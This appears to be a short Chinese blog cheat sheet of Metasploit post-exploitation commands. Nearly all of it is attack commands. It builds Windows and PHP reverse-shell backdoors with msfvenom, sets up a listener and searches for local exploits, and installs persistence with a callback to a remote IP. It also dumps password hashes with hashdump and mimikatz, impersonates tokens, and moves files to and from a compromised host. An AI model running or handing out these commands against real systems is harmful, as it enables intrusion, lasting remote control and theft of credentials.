• Metasploit笔记


    生成exe后门

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe -o 1987.exe

    生成PHP后门

    msfvenom -p php/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f raw > php.php

    使用监听模块(默认)

    use exploit/multi/handler

    set payload windows/meterpreter/reverse_tcp

    搜寻存在漏洞模块

    post/multi/recon/local_exploit_suggester

    迁移进程

    migrate pid

    权限维持 -Persistence

    run persistence -U -i 10 -p 4444 -r 192.168.61.3

    抓取Hash

    run hashdump

    load mimikatz

    令牌伪装

    list_tokens-u

    如果查看失败先用

    use incognito 或者 load incognito

    进入该模块 再使用

    impersonate_token 用户名

    基本操作命令

    ls:列出当前路径下的所有文件和文件夹。

    pwd 或 getwd:查看当前路径。

    search:搜索文件,使用 search -h 查看帮助。

    cat:查看文件内容,比如 cat test.txt

    edit:编辑或者创建文件。和Linux系统的vm命令类似,同样适用于目标系统是windows的情况。

    rm:删除文件。

    cd:切换路径。

    mkdir:创建文件夹。

    rmdir:删除文件夹。

    getlwd 或 lpwd:查看自己系统的当前路径。

    lcd:切换自己当前系统的目录。

    lls:显示自己当前系统的所有文件和文件夹。

    upload: upload 本地文件路径目标文件路径.

    download: download 目标文件路径 本地文件路径

  • 相关阅读:
    student
    super
    java 浮点数
    视图
    日期转换函数
    左外连接,右外连接,全外连接,自然连接,自连接区别
    Python中sys.argv[ ]的用法
    0 Scala
    统计字符串字符个数
    3个链表排序整合到一起
  • 原文地址:https://www.cnblogs.com/M0rta1s/p/11707871.html
Copyright © 2020-2023  润新知